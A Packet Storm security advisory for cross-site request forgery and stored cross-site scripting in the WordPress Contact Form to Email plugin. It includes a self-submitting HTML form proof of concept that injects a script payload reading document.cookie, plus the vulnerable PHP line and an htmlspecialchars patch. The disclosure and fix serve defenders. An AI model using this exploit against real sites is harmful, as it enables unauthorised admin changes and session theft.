what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Contact Form To Email Plugin CSRF / XSS

WordPress Contact Form To Email Plugin CSRF / XSS
Posted May 14, 2015
Authored by Ashiyane Digital Security Team

WordPress Contact Form To Email Plugin suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | advisory, vulnerability, xss, csrf
SHA-256 | 2aca5d9a62624deeeede389712066d5e147d5a31e58641761cd32697cfcfbe4a

WordPress Contact Form To Email Plugin CSRF / XSS

Change Mirror Download

/***********************************************************************************
** Exploit Title: Wordpress Contact Form to Email Plugin CSRF/XSS
**
** Exploit Author: Ashiyane Digital Security Team
**
** Discovered By: Mahdi.Hidden
**
** Vendor Homepage : https://wordpress.org/plugins/contact-form-to-email/
**
** Software Link:
https://downloads.wordpress.org/plugin/contact-form-to-email.zip
**
** Google Dork: none
**
** Date: 2015-05-13
**
** Tested on: Windows 7 / Mozila Firefox
**
***********************************************************************************
** Exploit Code:
******************

<html>
<body>
<form name="updatereportsettings"
action="http://localhost/wordpress/wp-admin/admin.php?page=cp_contactformtoemail"
method="post">
<input type="hidden" name="cp_cfte_rep_enable" value="No">
<input type="hidden" name="cp_cfte_rep_hour" value="00">
<input name="cp_cfte_fp_from_email" value="Hidden" type="hidden">
<input name="cp_cfte_rep_emails" value="Hidden" type="hidden">
<input name="cp_cfte_rep_subject" value="hidden" type="hidden">
<input type="hidden" name="cp_cfte_rep_emailformat" value="text">
<input type="hidden" name="cp_cfte_rep_message"
value='"></textarea><script>alert(document.cookie)</script>'>
<script language="Javascript">
setTimeout('updatereportsettings.submit()', 1);
</script>
</form>
</body>
</html>

***********************************************************************************
** Vulnerable Code:
******************

<textarea type="text" name="cp_cfte_rep_message" rows="3"
cols="80"><?php echo get_option('cp_cfte_rep_message', 'Attached you
will find the data from the form submissions.'); ?></textarea></td>

To Patch XSS :

<textarea type="text" name="cp_cfte_rep_message" rows="3"
cols="80"><?php echo
htmlspecialchars(get_option('cp_cfte_rep_message', 'Attached you will
find the data from the form submissions.')); ?></textarea></td>


***********************************************************************************
** Special thanks to: ACC3SS - Milad Hacking - T3rm!nat0r5
***********************************************************************************
***********************************************************************************\
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close